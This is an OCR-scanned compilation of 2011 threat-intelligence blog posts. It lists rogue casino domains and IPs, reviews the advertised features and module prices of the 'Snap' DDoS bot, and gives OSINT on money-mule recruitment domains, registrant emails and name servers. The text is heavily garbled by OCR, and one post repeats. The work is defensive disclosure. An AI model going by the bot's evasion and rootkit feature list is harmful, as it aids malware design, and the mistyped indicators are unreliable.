cazinoplazaworld.ru - 89.45.14.12 
cazino-plaza-world.ru - 89.45.14.12 
cazinowinplaza.ru - 89.45.14.12 
cazino-win-piaza.ru - 89.45.14.12 
cazinoworldplaza. ru -89.45.14.12 
cazino-world-plaza.ru - 89.45.14.12 
4elitcasinosuper.ru - 89.45.14.12 
elit-casino-super.ru - 89.45.14.12 
eiitsupercasino.ru -89.45.14.12 
elit-super-casino.ru - 89.45.14.12 
gamelabonline.ru - 78.46.105.205 
gameonlinelab.ru - 78.46.105.205 
745 
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game-party-royal.ru - 78.46.105.205 
gamezlabonline.ru - 89.45.14.12 
gamezmultilab.ru - 89.45.14.12 


gamez-net-online.ru - 89.45.14.12 
gamezonlinenet.ru - 89.45.14.12 
gamez-party-royai.ru - 89.45.14.12 
gamez-party-web.ru - 89.45.14.12 
gamezpartywin.ru -89.45.14.12 
gamez-party-win.ru - 89.45.14.12 
gamez-piaza-win.ru - 89.45.14.12 
gamezplaza world, ru - 89.45.14.12 
gamez-plaza-world.ru - 89.45.14.12 
gamez-vegas-web.ru - 89.45.14.12 
gamezweblab.ru - 89.45.14.12 
gamezwinpiaza.ru -89.45.14.12 
gamez-win-piaza.ru - 89.45.14.12 
gamezworldplaza.ru - 89.45.14.12 
joker-gamez-web.ru - 89.45.14.12 
kingcasinosuper.ru - 89.45.14.12 
king-casino-super.ru - 89.45.14.12 
kinggagnerr.net - 90.182.175.234 
kingsupercasino.ru - 89.45.14.12 
king-super-casino.ru -89.45.14.12 



lab-cazino-multi.ru - 89.45.14.12 
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lab-cazino-online. ru -89.45.14.12 
labgamezonline.ru - 89.45.14.12 
lab-gamez-web.ru - 89.45.14.12 
labonlinecazino.ru -89.45.14.12 
labonlinegame.ru - 78.46.105.205 
labvegascazino.ru - 89.45.14.12 
luxcasinosuper.ru - 89.45.14.12 
luxnextcasino. ru -89.45.14.12 
lux-next-casino.ru - 89.45.14.12 
multicasinosuper.ru - 89.45.14.12 
multilabgame.ru - 78.46.105.205 
multisupercasino.ru - 89.45.14.12 
netcasinosuper.ru - 89.45.14.12 
net-casino-super, ru - 89.45.14.12 
netpartycazino.ru - 89.45.14.12 
netsupercasino.ru - 89.45.14.12 
net-super-casino.ru - 89.45.14.12 
nextcasinovip.ru - 89.45.14.12 



next-casino-vip.ru - 89.45.14.12 
next-lux-casino.ru - 89.45.14.12 
nextvipcasino.ru -89.45.14.12 
onlinecasinosuper.ru - 90.182.175.234 
online-casino-super.ru - 90.182.175.234 
online-cazino-lab.ru - 89.45.14.12 
onlinegameznet.ru - 89.45.14.12 
online-gamez-vip.ru - 89.45.14.12 
onlinelabcazino.ru - 89.45.14.12 
onlinesupercasino.ru - 90.182.175.234 
online-super-casino.ru - 90.182.175.234 
partycasinosuper.ru - 90.182.175.234 
party-casino-web.ru - 78.46.105.205 
partycazinonet.ru - 89.45.14.12 
party-cazino-royal.ru - 89.45.14.12 
partycazinoweb.ru - 89.45.14.12 
partycazinowin.ru - 89.45.14.12 
partygamezroyal.ru - 89.45.14.12 
party-gamez-royal.ru - 89.45.14.12 
partygamezwin.ru - 89.45.14.12 



party-gamez-win.ru -89.45.14.12 
partynetcazino.ru - 89.45.14.12 
party-royal-cazino.ru - 89.45.14.12 
party-super-casino.ru - 89.45.14.12 
partywebcasino.ru - 78.46.105.205 
partywebcazino.ru - 89.45.14.12 
partywincazino.ru - 89.45.14.12 
party-win-cazino.ru -89.45.14.12 
play-multi-casino.ru -89.45.14.12 
plazacazinowin.ru - 89.45.14.12 
plaza-cazino-win.ru - 89.45.14.12 
piazacazino world, ru -89.45.14.12 
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plaza-cazino-world.ru - 89.45.14.12 
plaza-gamez-win.ru - 89.45.14.12 
plazagamezworld.ru - 89.45.14.12 
plaza-gamez-world.ru - 89.45.14.12 
plazawincazino.ru -89.45.14.12 
piaza-win-cazino.ru - 89.45.14.12 
plaza worldcazino. ru -89.45.14.12 



plaza-world-cazino.ru - 89.45.14.12 
royal-party-cazino.ru - 89.45.14.12 
star-casino-super.ru - 90.182.175.234 
star-super-casino.ru - 90.182.175.234 
super-casino-elit. ru -89.45.14.12 
supercasinoking.ru - 89.45.14.12 
super-casino-king, ru -89.45.14.12 
supercasinolab.ru - 89.45.14.12 
super-casino-land.ru - 90.182.175.234 
supercasinomulti.ru - 89.45.14.12 
supercasinonet.ru - 89.45.14.12 
super-casino-net.ru - 89.45.14.12 
supercasinoonline.ru - 90.182.175.234 
super-casino-online.ru - 90.182.175.234 
super-casino-star.ru - 90.182.175.234 
supercasinovip.ru - 89.45.14.12 
super-casino-vip.ru - 89.45.14.12 
super-casino-web.ru - 89.45.14.12 
super-casino-west.ru - 90.182.175.234 
supercasinowin.ru - 89.45.14.12 



super-casino-win.ru - 89.45.14.12 
super-elit-casino.ru - 89.45.14.12 
superkingcasino.ru - 89.45.14.12 
super-king-casino.ru -89.45.14.12 
super-land-casino.ru - 90.182.175.234 
super-multi-casino.ru - 89.45.14.12 
supernetcasino.ru - 89.45.14.12 
super-net-casino.ru - 89.45.14.12 
superonlinecasino.ru - 90.182.175.234 
super-online-casino.ru - 90.182.175.234 
superpartycasino.ru - 90.182.175.234 
super-party-casino.ru - 89.45.14.12 
superstarcasino.ru - 90.182.175.234 
super-star-casino.ru - 90.182.175.234 
super-vip-casino.ru - 89.45.14.12 
super-web-casino.ru - 89.45.14.12 
super-west-casino.ru - 90.182.175.234 
superwincasino.ru - 89.45.14.12 
vegas-game-web.ru - 78.46.105.205 
vegas-gamez-multi.ru - 89.45.14.12 



vegasgamezweb.ru - 89.45.14.12 
vipcasinosuper. ru -89.45.14.12 
vip-casino-super. ru - 89.45.14.12 
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vipnextcasino.ru -89.45.14.12 
vipsupercasino.ru - 89.45.14.12 
vip-super-casino.ru - 89.45.14.12 
web-casino-super.ru -89.45.14.12 
web-cazino-royai.ru - 89.45.14.12 
webgamezroyal.ru - 89.45.14.12 
webpartycazino.ru - 89.45.14.12 
web-super-casino, ru - 89.45.14.12 
west-super-casino.ru - 90.182.175.234 
wincasinosuper.ru - 89.45.14.12 
win-casino-super.ru -89.45.14.12 
win-cazino-piaza.ru - 89.45.14.12 
win-gamez-piaza.ru - 89.45.14.12 
winpartycazino.ru - 89.45.14.12 
win-party-cazino.ru - 89.45.14.12 
winplazacazino.ru -89.45.14.12 



win-plaza-cazino.ru - 89.45.14.12 
winsupercasino.ru - 89.45.14.12 
win-super-casino, ru - 89.45.14.12 
worldcazinoplaza.ru - 89.45.14.12 
world-cazino-plaza.ru - 89.45.14.12 
worldgamezplaza.ru - 89.45.14.12 
world-gamez-plaza.ru - 89.45.14.12 
world-plaza-cazino.ru - 89.45.14.12 
Monitoring of the campaign is ongoing. 

Related posts: 

[3] Don't Play Poker on an Infected Table - Part Four 

[4] Don't Play Poker on an Infected Table - Part Three 

[5] Don't Play Poker on an Infected Table - Part Two 

[6] Don't Play Poker on an Infected Table 

This post has been reproduced from [7]Dancho 
Danchev's blog. Follow him [8Jon Twitter. 

1. htto://ddanchev.blo as oot.com/2011/04/dont-ola v- ooker- 
on-infected-table-part.html 

2 . 

http://www. virustotal. com/file-scan/reoort.html? 

id=491 c291 eaedG7268dl 4a364 70e5d6f6d4ed829055fe4a28 

97ac5f0 











50b50a2e36-1304948544 


3. htto.V/ddanchev.blo as oot.com/2011/04/dont-ola v- ooker- 
on-infected-table-part.html 

4. htto.V/ddanchev.blo as oot.com/2010/03/dont-ola v- ooker- 
on-infected-table-part.html 

5. htto://ddanchev. blo as oot. com/2010/02/dont-ola v- ooker- 
on-infected-table-part. html 

6. http://ddanchev.blo as pot.com/2007/09/dont-pla v- poker- 
on-infected-table.html 

7. htto://ddanchev.blo as oot.com/ 

8. http://twitter.com/danchodanchev 
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A Peek Inside a New DDoS Bot - "Snap" (2011-05-09 
17:03) 

Sampling malicious activity through the eyes of the 
cybercriminal, is always beneficial in the context of timely 

spotting valuable trends and fads within the ecosystem, 
given a decent sample of malicious activity is obtained. 

In this post, we'll review a new DDoS bot on the block - 
"Snap". 

This modular bot differentiates itself by offering the ability to 
choose between different modules to be added 

to the final package, and by allowing to perform to 
"proprietary" DDoS functions, namely the TurboSYN, and 
TrafficDDoS. Next to its core DDoS functionality, the coder of 
the bot is differentiating by offering Form Grabbing; Reverse 
Socks; MailSpamming; IM-Spamming and Exploits launching 
functionality. 

More details from the actual proposition: 

[+] language the bot is coded in : mASM 

[+] no external depencies, no run times , no frame works! 

[+] Ability to work with roaming user accounts 













[+] modularized structure of the bot 
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[+] Second Backup Service watch process Activity and 
restart bot on fail over 

[+] User Mode rOOtkit 

-> [+] run's as a service and hides itself 

-> [+] hides & protect root process 

-> [+] hides & protect files 

-> [+] hides the root processes 

-> [+] hides already used local &remote TCP Port(s) 

-> [+] hides already used local &remote UDP Port(s) 

-> [+] hides already used regkey's 

[+] semi polymorphic architecture 

-> [+] uses random legit process, file & service names 

-> [+] generates a unique stub every run 

[+] bot doesn't use eof, has no import table, doesnt need 
relocation and tls section => very good crypter support 

[+] Unicode support for Asian pcs 

[+] detects common sandboxes, virtual 05s, emulators, and 
analysis tools 

[================[ Webpanel ]==- 





[+] the web pa net is developed with dreamweaver cs5 and 
ajax framework using mysql and php 

[+] multi theme support available 

[+] multi command support => every victim can do as many 
threads as you want it to 

[+] reliable protocol which creates the lowest possible server 
toad 

[+] modularized structure of the bot 

[===[ Modules ]==- 

[+] Base price (Core) for 250 $ 

Loader: 

[+] Load module (simple) +0 $ 

[+] Load module (extended) for 50 $ 

Proxy: 

[+] Socks5 Deamon for 50 $ 

[+] reverse Socks 4/Socks 4a/Socks 5/ HTTP(s) for 150 $ 
DDoS: 

[+] DDoS Module (http/syn) for 50 $ 

[+] DDoS Module (full) for 100 $ 

DDoS(full) + Load module (extended) + Socks5 Deamon for 
400 $ 


Related posts: 



[ 1 JCoding Spyware and Malware for Hire 

[2] Will Code Malware for Financial Incentives 

[3] E-crime and Socioeconomic Factors 

[4] Web Based Botnet Command and Control Kit 2.0 
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[5] BlackEnergy DDoS Bot Web Based 

[6] A New DDoS Malware Kit in the Wild 

[7] The Cyber Bot - Web Based Malware 

[8] The Black Sun Bot - Web Based Malware 

[9] Custom DDoS Capabilities Within a Malware 
[lOJBotnet on Demand Service 
[llJLoads.cc - DDoS for Hire Service 

[12] Using Market Forces to Disrupt Botnets 

[13] Botnet Communication Platforms 

[14] A Botnet Master's To-Do List 

[15] DDoS on Demand VS DDoS Extortion 

[16] How Does a Botnet with 100k Infected PCs Look Like? 

This post has been reproduced from [17]Dancho 
Danchev's blog. Follow him [18]on Twitter. 

1. htto://ddanchev.blo as oot.com/2008/07/codin a-SD Vware- 
and-malware-for-hire. html 






2. htto://ddanchev.blo as oot.com/2008/11/will-code-malware- 
for-financial.html 

3. http://ddanchev. blo as oot. com/2008/01/e-crime-and- 
socioeconomic-factors.html 

4. htto.V/ddanchev.blo as oot.com/2008/08/web-based-botnet- 
command-and-control.html 

5. http://ddanchev. blo as pot. com/2008/02/blackener a v-ddos- 
bot-web-based-c.html 

6. htto://ddanchev.blo as oot.com/2007/09/new-ddos- 
malware-kit-in-wild.html 

7. htto://ddanchev.blo as oot.com/2007/04/shots-from- 
malicious-wild-west-sample 20.html 

8. htto://ddanchev.blo as oot.com/2007/04/shots-from- 
malicious- wiid- west-samole_ 7672.h tml 

9. htto://ddanchev.blo as oot.com/2007/09/custom-ddos- 
ca pabilities-within-malware.html 

10. htto.V/ddanchev.blo as oot. com/2007/10/botnet-on- 
demand-service. html 

11. htto.V/ddanchev.blo as oot. com/2008/03/loadsccs-ddos-for- 
hire-service. html 

12. http://ddanchev.blo as pot.com/2008/06/usina-market- 
forces-to-disruot-botnets.html 

13. htto://ddanchev.blo as oot.com/2007/03/botnet- 
commun ica tion-ola tforms. h tml 

14. htto://ddanchev.blo as oot. com/2008/04/botnet-masters- 
to-do-list.html 















































15. httD://ddanchev.blo as DOt.com/2007/05/ddos-on-demand- 
vs-ddos-extortion. html 


16. htto.V/ddanchev.blo as oot.com/2008/05/how-does-botnet- 
with-1 OOk-infected-pcs. html 

17. http://ddanchev.blo as pot.com/ 

18. http://twitter.com/danchodanchev 
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What We Do 


Services Overview 


Provide an effective tool lor the artist and emerging • Search for latest in art work 

artist lo market and promote their art in a • Negotiate the beet possible price 

professional and inexpensive manner. • Submit special buyers requests 

• Provide 100% Guarantee 


About us 

We are the first choice tar artists and buyers alike' 
Marketing your art to the international community of 
buyers Our goal is lo enable artsts to sell original 
art to buyers all omer the world 


Welcome to Alternative Art Ltd Authorization 

Keeping Money Mule Recruiters on a Short Leash - 
Part Seven (2011-05-10 12:41) 

Continuing the what has turned into a tradition, the " 

[1 /Keeping Money Mule Recruiters on a Short Leash" series, 
in this post we'll review currently active money mule 
recruitment sites, and provide vital OS!NT data on what is 
















currently acting as the the cornerstone of the monetization 
process that cybercriminals rely on - risk forwarding thanks 
to money mule recruitment for processing of fraudulently 
obtained funds. 

Description used on the majority of templates: 

" Looking to buy art? Sell art? Alternative Art Ltd is the first 
choice for artists and buyers alike! Alternative Art Ltd is an 
effective tool for the artist and emerging artist to market and 
promote their art in a professional and inexpensive manner. 
We will market your art to the international community of art 
buyers. Whether you are looking to buy or sell original art, 
Alternative Art Ltd is the premier art site for those seeking to 
buy or sell original art online. 

NO COMMISSIONS! Whether you are looking to buy art or sell 
art, our site is fully optimized to get results 

FAST! Alternative Art Ltd is the future of buying and selling 
original art online. Artists who choose to sell their original art 
will receive maximum marketing exposure. For artists, selling 
your art has never been easier, faster, or more cost- 
effective. We will help you sell your original art DIRECTLY to 
buyers worldwide with NO COMMISSIONS. Those wishing to 
buy art online are invited to browse our extensive online 
galleries of original art. Never before has it been this easy for 
a buyer to select high-quality original art online. We update 
daily with new original art from our artist members. 

Alternative Art Ltd offers casual collectors and serious 
connoisseurs alike an amazing collection of original art 
pieces from the world over. You'll enjoy unparalleled 
customer care from a knowledgeable and friendly staff of 
experts. For artists, the inconvenience and high costs of 
traditional galleries are completely eliminated. Our team of 



experts puts the latest technology to work for you, putting 
your original art in front of millions of potential art buyers! " 

Money mule recruitment domains: 
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aimic-groupllc.at - Email: admin@aimic-groupiic.at 

ALTERNATIVE ART-LTD. COM 

alternative-art-ltd.net - Email: ibsen@ppmail.ru 

artby-gorup.net - Email: admin@artby-gorup.net 

artby-group.biz - Email: blonde@bz3.ru 

art-marketllc.cc - Email: hear@ppmail.ru - [2]seen here 

artsolveltdco.at - Email: admin@artsoiveitd.ee 

aspecs-group.cc - Email: admin@aspecs-group.cc 

ASPECS-GROUP.CC - Email: admin@aspecs-group.cc 

calUsto-ltdco.net - Email: admin@callisto-ltdco.net 

collins-group.cc - Email: admin@megatechservicegroup- 
ltd.ee 

collins-groupusa.com - Email: admin@collins- 
groupusa.com 

COLLINS-GROUPUSA.COM - Email: admin@collins- 
groupusa.com 

competitorgroup-ltd.com - Email: trek@cheapbox.ru 



COMPETITOR-UK-GROUP.NET - Email: admin@competitor- 
uk-group.net 

DERWART-GROUP.AT - Email: admin@derwart-group.at 

derwart-group.com - Email: admin@ephesgroup-llc.biz 

drawmade-group.com - Email: admin@drawmade- 
group.com 

DURLEY-ARTAU.NET - Email: admin@durley-artau.net 

DURLEY-ART-GROUP.CC - Email: admin@durley-art- 
group.cc 

ephesgroup-lie. biz - Email: admin@ephesgroup-llc.biz 

EPHES-GROUPLLC.CC - Email: admin@ephes-groupllc.cc 

ephes-groupllc.net - Email: pious@ppmail.ru 

fourthgroup-ltd.ee - Email: rots@cheapbox.ru - [3]seen 
here 

FOURTH-UKLTD.NET - Email: admin@fourth-ukitd.net 

generalabbrialgroup-ltd.net - Email: 
admin@generalabbrialgroup-ltd.net 

GENERATION-TEAM.NET - Email: luis@cheapbox.ru 

groupinc-upland.biz - Email: admin@groupinc-upiand.biz 

HELBY-GROUPLTD.BIZ - Email: admin@helby-groupltd.biz 

HELBY-GROUP-LTD.CC - Email: packet@bz3.ru 

koertig-gmbh.com - Email: usieeobq0604@yahoo.com 



kresko-group, biz - Email: admin@Kresko-group.biz 
LILAC-ANTIQUE.CC - Email: admin@lilac-antique.cc 

MASTERPIECE-CROUP.CC - Email: poop@ca4.ru 

MASTERPIECE-CROUP.ORG - Email: admin@masterpiece- 
group.org 

megatechservicegroup-ltd.cc - Email: 
admin@megatechservicegroup-ltd.cc 

MECATECHSERVICE-CROUP-LTD.COM Email: 
admin@collins-groupusa. com 

millennial-maingrop.net - Email: mock@free-id.ru 
mitissanservice-group-ltd.cc - Email: berra@cutemail.org 
mitissanservicegroup-ltd.com - Email: alibi@mailae.com 
neoline-groupco.cc - Email: admin@neoline-groupco.cc 
neoline-llc.net - Email: admin@neoline-llc.net 
qead-groupllc. net 

QEAD-LLC.BIZ - Email: admin@qead-llc.biz 

RICHMOND-ART-CROUP.COM - Email: binary@ca4.ru 

RICHMOND-ART-UK.BIZ - Email: admin@richmond-art- 
uk.biz 

sevg-groupnet.com - Email: belle@ca4.ru 
SEVC-CROUPNET.COM - Email: belle@ca4.ru 
sevg-incgr.net - Email: admin@sevg-incgr.net 



SQUIT-GROUP-LLC.BIZ - Email: swept@ca4.ru 
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aimicgroupllc.ee 



SQUITGROUP-LLC.NET - Email: admin@squitgroup-llc.net 

targetmarketgroup-llc.cc - Email: 
admin@targetmarketgroup-llc. cc 


targetmarket-groupllc. net 




tazprogltd-us.com - Email: admin@tazprogltd-us.com 

TONSLEY-ART.COM - Email: pagan@ppmail.ru 

tonsley-group-uk.net - Email: admin@tonsley-group- 
uk.net 

WEST-VIEW-ART.CC - Email: knees@free-id.ru 
westview-art.net - Email: admin@westview-art.net 
Name servers of notice: 

NS1.USDENNS.SU - 217 . 23 . 15.136 
NS2.DNSUS.SU - 87 . 118 . 81.7 
NS3.NAMEUSNS.SU - 84 . 19 . 161.10 
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alternative-art-ltd.net 

193.105.134.23 

westview-art.net 

193.105.134.23 

RICHMOND-ART-UK. BIZ 

193.105.134.23 

fourthgroup-ltd.ee 

193.105.134.23 

artby-group.biz 

98.141.220.118 

collins-group.ee 

98.141.220.118 

aspees-group.ee 

98.141.220.117 

ASPECS-GROUP.CC 

98.141.220.117 

callisto-ltdco.net 

98.141.220.117 

dra wmade-group. com 

98.141.220.117 

ephes-groupllc.net 

98.141.220.117 

targetmarketgroup-llc. cc 

98.141.220.117 

artby-gorup.net 

98.141.220.116 

tazprogltd-us.com 

98.141.220.116 

groupinc-upland.biz 

98.141.220.115 

neoline-llc.net 

98.141.220.115 

DERWART-GROUP.AT 

98.141.220.114 

ALTERNATIVEART-LTD.COM 

86.55.210.5 

collins-groupusa.com 

78.46.105.205 

COLLINS-GROUPUS A. COM 

78.46.105.205 

derwart-group.com 

78.46.105.205 

DURLEY-ARTAU.NET 

78.46.105.205 

DURLEY-ART-GROUP.CC 

78.46.105.205 

ephesgroup-llc.biz 

78.46.105.205 

EPHES-GROUPLLC.CC 

78.46.105.205 

kresko-group.biz 

78.46.105.205 

MASTERPIECE-GROUP.CC 

78.46.105.205 

QEAD-LLC.BIZ 

78.46.105.205 

SEVG-GROUPNET.COM 

78.46.105.205 

SOUITGROUP-LLC.NET 

78.46.105.205 


nsl.pidnsku.org - 86 . 55 . 210.23 
ns3.uslcopy. ws - 95 . 64 . 9.101 
ns2.uslcopy.at- 78 . 46 . 105.205 
ns2.steisgid.net - 78 . 46 . 105.205 
nsl.usolomio.ee - 86 . 55 . 210.23 
ns2.usetmegold.su - 78 . 46 . 105.205 
ns3.usiami.su - 78 . 46 . 105.205 


nsl.ukansnami.com - 78 . 46 . 105.205 



ns3.uknamo.com - 66 . 199 . 236.116 


ns2.dnsukrect.com - 78 . 46 . 105.205 

Currently active and responding money mule recruitment 
domains, residing within AS42708 > PORTLANE Network; 
AS29713, INTERPLEXINC Interplex LLC.; AS24940 , 
HETZNER-AS Hetzner Online AG RZ: 

alternative-art-ltd.net - 193 . 105 . 134.234 

westvie w-art. net - 193 . 105 . 134.233 

RICHMOND-ART-UK.BIZ - 193 . 105 . 134.232 

fourthgroup-ltd. cc - 193 . 105 . 134.230 

artby-group.biz - 98 . 141 . 220.118 

collins-group.cc - 98 . 141 . 220.118 

aspecs-group.cc - 98 . 141 . 220.117 
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ASPECS-GROUP.CC - 98 . 141 . 220.117 
callisto-ltdco. net - 98 . 141 . 220.117 
drawmade-group.com - 98 . 141 . 220.117 
ephes-groupllc.net - 98 . 141 . 220.117 
targetmarketgroup-llc. cc - 98 . 141 . 220.117 
artby-gorup.net - 98 . 141 . 220.116 
tazprogltd-us. com - 98 . 141 . 220.116 



groupinc-upland.biz - 98 . 141 . 220.115 

neoline-llc.net - 98 . 141 . 220.115 

DERWART-GROUP.AT 98 . 141 . 220.114 

ALTERNATiVEART-LTD.COM 86 . 55 . 210.5 

collins-groupusa.com - 78 . 46 . 105.205 

COLLINS-CROUPUSA.COM - 78 . 46 . 105.205 

derwart-group.com - 78 . 46 . 105.205 

DURLEY-ARTAU.NET - 78 . 46 . 105.205 

DURLEY-ART-CROUP.CC 78 . 46 . 105.205 

ephesgroup-llc. biz - 78 . 46 . 105.205 

EPHES-GROUPLLC.CC - 78 . 46 . 105.205 

kresko-group. biz - 78 . 46 . 105.205 

MASTERPIECE-GROUP.CC 78 . 46 . 105.205 

QEAD-LLC.BIZ - 78 . 46 . 105.205 

SEVG-GROUPNET.COM - 78 . 46 . 105.205 

SQUITGROUP-LLC.NET - 78 . 46 . 105.205 

Psychological evaluation tests found within AS29713, 
basically every domain name has its associated 
binary: 

aimicgroupllc. exe 
artbygorup. exe 



aspecsgroup. exe 
atlantgroupmain. exe 
collinsgroupusa. exe 
createncegroupUc. exe 
derwartgroup. exe 
dogogroup.exe 
ephesgroupllc. exe 
megatechservicegroupltd. exe 
millermialartco. exe 
sevggroupnet. exe 
stilegroupllc. exe 
vintagegroupinc. exe 

Monitoring of money mule recruitment campaigns is 
ongoing. 

Related posts: 

[4] Keeping Money Mule Recruiters on a Short Leash - Part Six 

[5] Keeping Money Mule Recruiters on a Short Leash - Part 
Five 

[6] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[7] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 



[8] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[9] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[10] Money Mule Recruiters on Yahoo!'s Web Hosting 
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[llJDissecting an Ongoing Money Mule Recruitment 
Campaign 

[12] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[13] Keeping Reshipping Mule Recruiters on a Short Leash 

[14] Keeping Money Mule Recruiters on a Short Leash 

[15] Standardizing the Money Mule Recruitment Process 

[16] inside a Money Laundering Group's Spamming 
Operations 

[17] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[18] Money Mules Syndicate Actively Recruiting Since 2002 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Eight - Historical OSiNT (2011-05-25 13:18) 

With money mule recruitment scams continuing to represent 
an inseparable part of the cybercrime ecosystem, in 


this post I'll summarize the findings from an assessment / 
conducted on currently active mule recruitment scams 


























over a month ago. As always, the historical OS I NT offered is 
invaluable in case-building practices in particular a very well 
segmented group of mule recruiters using identical 
templates which they've purchased from a vendor of 

standardized mule recruitment templates. 

Domains known to have been participating in money mule 
recruitment campaigns, currently offine: 

allston-groupsec. cc 

atca-inc.com 

atcanetworks.net 

BANDSGROUP-iNC.NET 



BA NDS CROUPNET. CC 


BANDS-GROUPSVC. COM 
BANDS-INC.COM 
CNL GROUP-1NC. CC 
CNL GROUPNET. NET 
CNL-GROUPSVC. COM 
CNL-INC.COM 
e volving-inc. com 
e volvingsysinc. net 
galleogroupnet.net 
galleo-inc. com 
GIANT-GROUPCO.NET 
GIA NTGROUPINC. COM 
GIANT-GROUPINC. COM 
GIANT-GROUPNET. CC 
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HOSTGROUPINC. COM 
HOSTGROUP-INC. COM 


HOSTGROUPNET. CC 



HOS T- CR OUPS VC. NET 
ICT-GROUPCO. COM 
ICTGROUPINC. COM 
ICTCROUPNET.CC 
ICT-GROUPS VC. NET 
IMPERIALGROUPCO. COM 
IMPERIAL-GROUPINC. COM 
IMPERIAL-CROUPSVC.NET 
INFOTECH-CROUPCO.NET 
INFOTECH-GROUPINC. COM 
infotechgroup-inc. com 
jvc-inc.com 
magnet-groupinc. cc 
netmarket-inc. com 
netmarkettech.net 
NOVARIS-CROUPLLC. TW 
NOVARISGROUPMAIN. TW 
NOVARIS-GROUPORC. CC 
PERSEUS-GROUPFINE. TW 


PERSEUS-CROUPINC. TW 



PERSEUSCROUPLLC. CC 


USIGROUPINC. COM 
USIGROUP-INC. COM 
USI-GROUPINC. NET 
USIGROUPNET.CC 
VITAL-GROUPCO. CC 
VITAL-GROUPCO. TW 
VITAL-GROUPINC. TW 

developgroupinc.net - 69.50.199.209 - Email: 
slows@5mx.ru 

develop-inc.com - 69.50.199.209 - Email: etude@qx8. 

mercygroupnet.net - 69.50.198.218 - Email: 
bo wie@bigmailbox. ru 

mercy-inc.com - 69.50.198.221 - Email: 
spout@freenetbox. ru 

solarisgroupinc.com - 69.50.199.209 - Email: 
slows@5mx.ru 

soiarisgroupnet.net - 69.50.198.197 - Email: 
sharp@maillife. ru 

jvc-inc.com - 69.50.198.210 - Email: etude@qx8.ru 

jvcgroupnet.net - 69.50.198.221 - Email: 
spout@freenetbox. ru 



Name servers of notice, historical OSINT for the responding 
IPs provided: 

nsl.kalipsol9.cc - 208.110.80.34 - Email: 
tarts@freenetbox. ru 

ns2.kalipsol9.cc - 64.85.169.70 

ns3.kaiipsol9.ee - 173.208.132.42 

nsl.mamachoii.net - 208.110.80.35 - Email: 
excess@bigmailbox. ru 

ns2.mamacholi.net - 64.85.169.71 

ns3.mamacholi.net - 173.208.132.43 

nsl.rjevski.com - 208.110.80.34 - Email: 
io w@bigmaiibox. ru 
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ns2.rjevski.com - 64.85.169.70 

ns3.rjevski.com - 173.208.132.42 

nsl.runiesrun.ee - 208.110.80.37 - Email: 
frost@bigmailbox. ru 

ns2.runlesrun.ee - 64.85.169.73 

ns3.runiesrun.ee - 173.208.132.45 

nsl.skotinko.net - 208.110.80.38 - Email: 
in fo@dn registrar, ru 

ns2.skotinko.net - 64.85.169.74 


ns3.skotinko.net - 173.208.132.46 



nsl.solojumper.com - 208.110.80.36 - Email: 
crime@bigmaiibox. ru 

ns2.solojumper.com - 64.85.169.72 

ns3.solojumper.com -173.208.132.44 

Monitoring of money mule recruitment campaigns is 
ongoing. 

Related posts: 

[ 1 ]Keeping Money Mule Recruiters on a Short Leash - Part 
Seven 

[2] Keeping Money Mule Recruiters on a Short Leash - Part Six 

[3] Keeping Money Mule Recruiters on a Short Leash - Part 
Five 

[4] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[5] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[6] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[7] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[8] Money Mule Recruiters on Yahoo!'s Web Hosting 

[9] Dissecting an Ongoing Money Mule Recruitment 
Campaign 



[lOJKeeping Money Mule Recruiters on a Short Leash - Part 
Two 

[llJKeeping Reshipping Mule Recruiters on a Short Leash 

[12] Keeping Money Mule Recruiters on a Short Leash 

[13] Standardizing the Money Mule Recruitment Process 

[14] Inside a Money Laundering Group's Spamming 
Operations 

[15] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[16] Money Mules Syndicate Actively Recruiting Since 2002 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Eight - Historical OSiNT (2011-05-25 13:18) 

With money mule recruitment scams continuing to represent 
an inseparable part of the cybercrime ecosystem, in 

this post I'll summarize the findings from an assessment / 
conducted on currently active mule recruitment scams 

over a month ago. As always, the historical OSINT offered is 
invaluable in case-building practices in particular a very well 
segmented group of mule recruiters using identical 
templates which they've purchased from a vendor of 

standardized mule recruitment templates. 

Domains known to have been participating in money mule 
recruitment campaigns, currently offine: 


allston-groupsec. cc 







atca-inc.com 


atcanetworks.net 
BANDSCROUP-INC.NET 
BANDSGROUPNET. CC 
BANDS-CROUPSVC. COM 
BANDS-INC.COM 
CNL CROUP-1 NC. CC 
CNL GROUPNET. NET 
CNL-GROUPSVC. COM 
CNL-INC.COM 
e volving-inc. com 
e voivingsysinc. net 
galleogroupnet.net 
galleo-inc. com 
GIANT-GROUPCO.NET 
GIA NTGROUPINC. COM 
GIANT-GROUPINC. COM 
GIANT-GROUPNET. CC 
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HOSTGROUPINC. COM 



HOSTGROUP-INC. COM 
HOSTGROUPNET. CC 
HOS T- GR O UPS VC. NET 
iCT-GROUPCO. COM 
ICTGROUPINC. COM 
ICTGROUPNET.CC 
ICT-G ROUPS VC. NET 
IMPERIALGROUPCO. COM 
IMPERIAL-GROUPINC. COM 
IMPERIAL-GROUPSVC.NET 
INFOTECH-GROUPCO.NET 
INFOTECH-GROUPINC. COM 
infotechgroup-inc. com 
jvc-inc.com 
magnet-groupinc. cc 
netmarket-inc. com 
netmarkettech.net 
NOVARIS-GROUPLLC. TW 
NOVARISGROUPMAIN. TW 


NOVARIS-GROUPORG. CC 



PERSEUS-GROUPFINE. TW 


PERSEUS-GROUPINC. TW 
PERSEUSGROUPLLC. CC 
USIGROUPINC. COM 
USIGROUP-INC. COM 
USI-GROUPINC. NET 
USIGROUPNET.CC 
VITAL-GROUPCO. CC 
VITAL-GROUPCO. TW 
VITAL-GROUPINC. TW 

developgroupinc.net - 69.50.199.209 - Email: 
slows@5mx.ru 

develop-inc.com - 69.50.199.209 - Email: etude@qx8. 

mercygroupnet.net - 69.50.198.218 - Email: 
bo wie@bigmailbox. ru 

mercy-inc.com - 69.50.198.221 - Email: 
spout@freenetbox. ru 

solarisgroupinc.com - 69.50.199.209 - Email: 
